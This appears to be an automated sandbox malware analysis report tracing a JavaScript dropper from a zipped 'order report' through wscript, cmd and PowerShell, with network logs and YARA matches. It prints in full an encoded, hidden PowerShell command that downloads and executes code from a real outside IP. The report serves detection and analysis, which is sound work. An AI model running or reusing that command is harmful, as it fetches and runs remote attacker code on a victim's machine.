                                                                                                                                                                Aug 16, 2021 19:11:54.722656012 CEST6265553192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:11:54.743086100 CEST53626551.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:54.809957981 CEST5312053192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:11:54.831034899 CEST53531201.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:58.202316999 CEST6068753192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:11:58.222853899 CEST53606871.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:16.872345924 CEST5105653192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:12:16.893100977 CEST53510561.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:17.032330990 CEST6114553192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:12:17.054199934 CEST53611451.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:17.412940979 CEST6243653192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:12:17.433939934 CEST53624361.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:18.461515903 CEST6493153192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:12:18.482191086 CEST53649311.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:18.500047922 CEST6445353192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:12:18.520726919 CEST53644531.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:18.663259029 CEST5724953192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:12:18.665205002 CEST5996253192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:12:18.683573008 CEST53572491.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:18.685648918 CEST53599621.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:18.742348909 CEST5972953192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:12:18.763098955 CEST53597291.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:19.930918932 CEST6435253192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:12:19.952469110 CEST53643521.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:21.576884985 CEST6323453192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:12:21.597570896 CEST53632341.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:21.808640003 CEST6359953192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:12:21.829956055 CEST53635991.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:31.798208952 CEST5086553192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:12:31.818866014 CEST53508651.1.1.1192.168.2.3

                                                                                                                                                                DNS Queries

                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                Aug 16, 2021 19:10:18.734625101 CEST192.168.2.31.1.1.10x5a04Standard query (0)fa000000064.resources.office.netA (IP address)IN (0x0001)
                                                                                                                                                                Aug 16, 2021 19:10:18.761244059 CEST192.168.2.31.1.1.10x95afStandard query (0)fa000000068.resources.office.netA (IP address)IN (0x0001)
                                                                                                                                                                Aug 16, 2021 19:10:19.168190956 CEST192.168.2.31.1.1.10xf764Standard query (0)fa000000070.resources.office.netA (IP address)IN (0x0001)
                                                                                                                                                                Aug 16, 2021 19:10:19.175411940 CEST192.168.2.31.1.1.10xff89Standard query (0)fa000000072.resources.office.netA (IP address)IN (0x0001)
                                                                                                                                                                Aug 16, 2021 19:10:19.801208019 CEST192.168.2.31.1.1.10xb40fStandard query (0)wa104381125.resources.office.netA (IP address)IN (0x0001)
                                                                                                                                                                Aug 16, 2021 19:10:34.452843904 CEST192.168.2.31.1.1.10xb80bStandard query (0)clients2.google.comA (IP address)IN (0x0001)
                                                                                                                                                                Aug 16, 2021 19:10:34.453860998 CEST192.168.2.31.1.1.10xe975Standard query (0)s7d9.scene7.comA (IP address)IN (0x0001)
                                                                                                                                                                Aug 16, 2021 19:10:34.458116055 CEST192.168.2.31.1.1.10xde37Standard query (0)accounts.google.comA (IP address)IN (0x0001)
                                                                                                                                                                Aug 16, 2021 19:10:35.086837053 CEST192.168.2.31.1.1.10x1a8fStandard query (0)s7d9.scene7.comA (IP address)IN (0x0001)
                                                                                                                                                                Aug 16, 2021 19:10:35.521699905 CEST192.168.2.31.1.1.10x1417Standard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)
                                                                                                                                                                Aug 16, 2021 19:10:36.543579102 CEST192.168.2.31.1.1.10xd403Standard query (0)sb-ssl.google.comA (IP address)IN (0x0001)
                                                                                                                                                                Aug 16, 2021 19:12:18.665205002 CEST192.168.2.31.1.1.10x3c22Standard query (0)g.live.comA (IP address)IN (0x0001)
                                                                                                                                                                Aug 16, 2021 19:12:21.576884985 CEST192.168.2.31.1.1.10x55eeStandard query (0)g.live.comA (IP address)IN (0x0001)

                                                                                                                                                                DNS Answers

                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                Aug 16, 2021 19:10:18.799119949 CEST1.1.1.1192.168.2.30x5a04No error (0)fa000000064.resources.office.netresources.office.net.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                Aug 16, 2021 19:10:18.825979948 CEST1.1.1.1192.168.2.30x95afNo error (0)fa000000068.resources.office.netresources.office.net.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                Aug 16, 2021 19:10:19.194068909 CEST1.1.1.1192.168.2.30xf764No error (0)fa000000070.resources.office.netresources.office.net.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                Aug 16, 2021 19:10:19.364707947 CEST1.1.1.1192.168.2.30xff89No error (0)fa000000072.resources.office.netresources.office.net.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                Aug 16, 2021 19:10:19.870716095 CEST1.1.1.1192.168.2.30xb40fNo error (0)wa104381125.resources.office.netresources.office.net.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                Aug 16, 2021 19:10:24.673111916 CEST1.1.1.1192.168.2.30xc704No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                Aug 16, 2021 19:10:24.953073025 CEST1.1.1.1192.168.2.30x6dedNo error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                Aug 16, 2021 19:10:25.279184103 CEST1.1.1.1192.168.2.30x610cNo error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                Aug 16, 2021 19:10:25.580719948 CEST1.1.1.1192.168.2.30xef92No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                Aug 16, 2021 19:10:34.473799944 CEST1.1.1.1192.168.2.30xb80bNo error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                Aug 16, 2021 19:10:34.473799944 CEST1.1.1.1192.168.2.30xb80bNo error (0)clients.l.google.com172.217.168.46A (IP address)IN (0x0001)
                                                                                                                                                                Aug 16, 2021 19:10:34.478817940 CEST1.1.1.1192.168.2.30xde37No error (0)accounts.google.com172.217.168.13A (IP address)IN (0x0001)
                                                                                                                                                                Aug 16, 2021 19:10:34.552921057 CEST1.1.1.1192.168.2.30xe975No error (0)s7d9.scene7.comwildcard.scene7.com.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                Aug 16, 2021 19:10:35.107531071 CEST1.1.1.1192.168.2.30x1a8fNo error (0)s7d9.scene7.comwildcard.scene7.com.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                Aug 16, 2021 19:10:35.542895079 CEST1.1.1.1192.168.2.30x1417No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                Aug 16, 2021 19:10:35.542895079 CEST1.1.1.1192.168.2.30x1417No error (0)googlehosted.l.googleusercontent.com172.217.168.65A (IP address)IN (0x0001)
                                                                                                                                                                Aug 16, 2021 19:10:36.564141035 CEST1.1.1.1192.168.2.30xd403No error (0)sb-ssl.google.comsb-ssl.l.google.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                Aug 16, 2021 19:10:36.564141035 CEST1.1.1.1192.168.2.30xd403No error (0)sb-ssl.l.google.com172.217.168.78A (IP address)IN (0x0001)
                                                                                                                                                                Aug 16, 2021 19:12:18.685648918 CEST1.1.1.1192.168.2.30x3c22No error (0)g.live.comg.msn.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                Aug 16, 2021 19:12:18.685648918 CEST1.1.1.1192.168.2.30x3c22No error (0)g.msn.comg-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                Aug 16, 2021 19:12:21.597570896 CEST1.1.1.1192.168.2.30x55eeNo error (0)g.live.comg.msn.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                Aug 16, 2021 19:12:21.597570896 CEST1.1.1.1192.168.2.30x55eeNo error (0)g.msn.comg-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)

                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                • 185.244.41.28

                                                                                                                                                                HTTP Packets

                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                0192.168.2.365398185.244.41.2880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                Aug 16, 2021 19:12:07.740905046 CEST34564OUTGET /click.php HTTP/1.1
                                                                                                                                                                Host: 185.244.41.28
                                                                                                                                                                Connection: Keep-Alive


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                1185.244.41.2880192.168.2.365398C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                Aug 16, 2021 19:12:08.822601080 CEST34565INHTTP/1.0 404 not found
                                                                                                                                                                Date: Mon, 16 Aug 2021 17:12:07 GMT
                                                                                                                                                                Server: Apache/2.4.38 (Debian)
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Code Manipulations

                                                                                                                                                                Statistics

                                                                                                                                                                CPU Usage

                                                                                                                                                                Click to jump to process

                                                                                                                                                                Memory Usage

                                                                                                                                                                Click to jump to process

                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                Behavior

                                                                                                                                                                Click to jump to process

                                                                                                                                                                System Behavior

                                                                                                                                                                Analysis Process: chrome.exe PID: 6020 Parent PID: 6152

                                                                                                                                                                General

                                                                                                                                                                Start time:19:10:28
                                                                                                                                                                Start date:16/08/2021
                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation --single-argument C:\Users\user\Desktop\file.html
                                                                                                                                                                Imagebase:0x7ff6ba3f0000
                                                                                                                                                                File size:2438312 bytes
                                                                                                                                                                MD5 hash:74859601FB4BEEA84B40D874CCB56CAB
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: chrome.exe PID: 7472 Parent PID: 6020

                                                                                                                                                                General

                                                                                                                                                                Start time:19:10:30
                                                                                                                                                                Start date:16/08/2021
                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1584,1496132701367439280,374523328326216020,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 /prefetch:8
                                                                                                                                                                Imagebase:0x7ff6ba3f0000
                                                                                                                                                                File size:2438312 bytes
                                                                                                                                                                MD5 hash:74859601FB4BEEA84B40D874CCB56CAB
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: chrome.exe PID: 7180 Parent PID: 6020

                                                                                                                                                                General

                                                                                                                                                                Start time:19:10:32
                                                                                                                                                                Start date:16/08/2021
                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1584,1496132701367439280,374523328326216020,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5016 /prefetch:8
                                                                                                                                                                Imagebase:0x7ff6ba3f0000
                                                                                                                                                                File size:2438312 bytes
                                                                                                                                                                MD5 hash:74859601FB4BEEA84B40D874CCB56CAB
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: chrome.exe PID: 8712 Parent PID: 6020

                                                                                                                                                                General

                                                                                                                                                                Start time:19:10:36
                                                                                                                                                                Start date:16/08/2021
                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1584,1496132701367439280,374523328326216020,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5544 /prefetch:8
                                                                                                                                                                Imagebase:0x7ff6ba3f0000
                                                                                                                                                                File size:2438312 bytes
                                                                                                                                                                MD5 hash:74859601FB4BEEA84B40D874CCB56CAB
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: chrome.exe PID: 8256 Parent PID: 6020

                                                                                                                                                                General

                                                                                                                                                                Start time:19:10:58
                                                                                                                                                                Start date:16/08/2021
                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1584,1496132701367439280,374523328326216020,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3164 /prefetch:8
                                                                                                                                                                Imagebase:0x7ff6ba3f0000
                                                                                                                                                                File size:2438312 bytes
                                                                                                                                                                MD5 hash:74859601FB4BEEA84B40D874CCB56CAB
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: chrome.exe PID: 8600 Parent PID: 6020

                                                                                                                                                                General

                                                                                                                                                                Start time:19:10:59
                                                                                                                                                                Start date:16/08/2021
                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1584,1496132701367439280,374523328326216020,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6516 /prefetch:8
                                                                                                                                                                Imagebase:0x7ff6ba3f0000
                                                                                                                                                                File size:2438312 bytes
                                                                                                                                                                MD5 hash:74859601FB4BEEA84B40D874CCB56CAB
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: explorer.exe PID: 3676 Parent PID: 6020

                                                                                                                                                                General

                                                                                                                                                                Start time:19:11:12
                                                                                                                                                                Start date:16/08/2021
                                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                Imagebase:0x7ff65b130000
                                                                                                                                                                File size:4612520 bytes
                                                                                                                                                                MD5 hash:D7874DD30BA935AAED6F730A0ED84610
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: wscript.exe PID: 6608 Parent PID: 3676

                                                                                                                                                                General

                                                                                                                                                                Start time:19:11:42
                                                                                                                                                                Start date:16/08/2021
                                                                                                                                                                Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Temp1_Report_03874.zip\Order_Report_12.js'
                                                                                                                                                                Imagebase:0x7ff7a4fc0000
                                                                                                                                                                File size:165888 bytes
                                                                                                                                                                MD5 hash:563EDAE37876138FDFF47F3E7A9A78FD
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000013.00000003.10199880080.000001AF430F8000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000013.00000003.10197684686.000001AF430F8000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000013.00000003.10199731855.000001AF430F8000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000013.00000002.10205510794.000001AF433E5000.00000004.00000040.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000013.00000002.10209412160.000001AF44E70000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000013.00000002.10204462615.000001AF430E7000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000013.00000002.10204462615.000001AF430E7000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000013.00000003.10197150129.000001AF43121000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000013.00000002.10204790473.000001AF43145000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000013.00000003.10197244915.000001AF43145000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000013.00000002.10204512036.000001AF430F8000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000013.00000002.10204700660.000001AF43121000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000013.00000003.10199822299.000001AF430E6000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000013.00000003.10199822299.000001AF430E6000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000013.00000003.10199638722.000001AF430D2000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000013.00000003.10199638722.000001AF430D2000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000013.00000003.10199404893.000001AF430BB000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000013.00000003.10199404893.000001AF430BB000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000013.00000003.10197553372.000001AF430B8000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000013.00000003.10197553372.000001AF430B8000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000013.00000003.10199569415.000001AF430F8000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                Reputation:low

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: cmd.exe PID: 7184 Parent PID: 6608

                                                                                                                                                                General

                                                                                                                                                                Start time:19:11:48
                                                                                                                                                                Start date:16/08/2021
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:'C:\Windows\System32\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=
                                                                                                                                                                Imagebase:0x7ff633bc0000
                                                                                                                                                                File size:280064 bytes
                                                                                                                                                                MD5 hash:9D59442313565C2E0860B88BF32B2277
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: conhost.exe PID: 2988 Parent PID: 7184

                                                                                                                                                                General

                                                                                                                                                                Start time:19:11:49
                                                                                                                                                                Start date:16/08/2021
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff703e40000
                                                                                                                                                                File size:885760 bytes
                                                                                                                                                                MD5 hash:C5E9B1D1103EDCEA2E408E9497A5A88F
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: powershell.exe PID: 7296 Parent PID: 7184

                                                                                                                                                                General

                                                                                                                                                                Start time:19:11:49
                                                                                                                                                                Start date:16/08/2021
                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=
                                                                                                                                                                Imagebase:0x7ff6732e0000
                                                                                                                                                                File size:451584 bytes
                                                                                                                                                                MD5 hash:CDA48FC75952AD12D99E526D0B6BF70A
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000016.00000002.10523891301.000001C9302F0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000016.00000002.10483734570.000001C92CFC0000.00000004.00000020.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000016.00000002.10486540996.000001C92D220000.00000004.00000040.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000016.00000002.10487123418.000001C92EAE0000.00000004.00000040.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000016.00000003.10471709581.000001C9473AE000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000016.00000002.10534609217.000001C9473AE000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000016.00000003.10471907288.000001C9473AE000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                Reputation:low

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Disassembly

                                                                                                                                                                Code Analysis

                                                                                                                                                                Reset < >

                                                                                                                                                                  Analysis Process: powershell.exe PID: 7296 Parent PID: 7184 powershell.exeCOMMON

                                                                                                                                                                  Executed Functions

                                                                                                                                                                  Function 00007FFA68386B40, Relevance: .7, Instructions: 671COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000016.00000002.10539166773.00007FFA68380000.00000040.00000001.sdmp, Offset: 00007FFA68380000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ffa68380000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 86311e2085a1822f42dd9f1d402237d171c8edd3fceb6f753042ca29b6b0efa6
                                                                                                                                                                  • Instruction ID: 582bde30652e82c9fac1197f49c8386a9f2711cb9714cfbc3d877cfc72d258e2
                                                                                                                                                                  • Opcode Fuzzy Hash: 86311e2085a1822f42dd9f1d402237d171c8edd3fceb6f753042ca29b6b0efa6
                                                                                                                                                                  • Instruction Fuzzy Hash: 81E1A270A18A4D8FDF88DF5CC495AA97BF1FF69310F1481A9D40DD7296DA34E882CB80
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00007FFA6845078D, Relevance: .5, Instructions: 464COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000016.00000002.10539604079.00007FFA68450000.00000040.00000001.sdmp, Offset: 00007FFA68450000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ffa68450000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: f656b3fa76c92bd10bb17c4aeefd51272ba0526cd15332dac1caa40344829349
                                                                                                                                                                  • Instruction ID: fd31d3118c346e3b1c33382f0e5ca7f2a2606f9cc972b81f80044783415b1511
                                                                                                                                                                  • Opcode Fuzzy Hash: f656b3fa76c92bd10bb17c4aeefd51272ba0526cd15332dac1caa40344829349
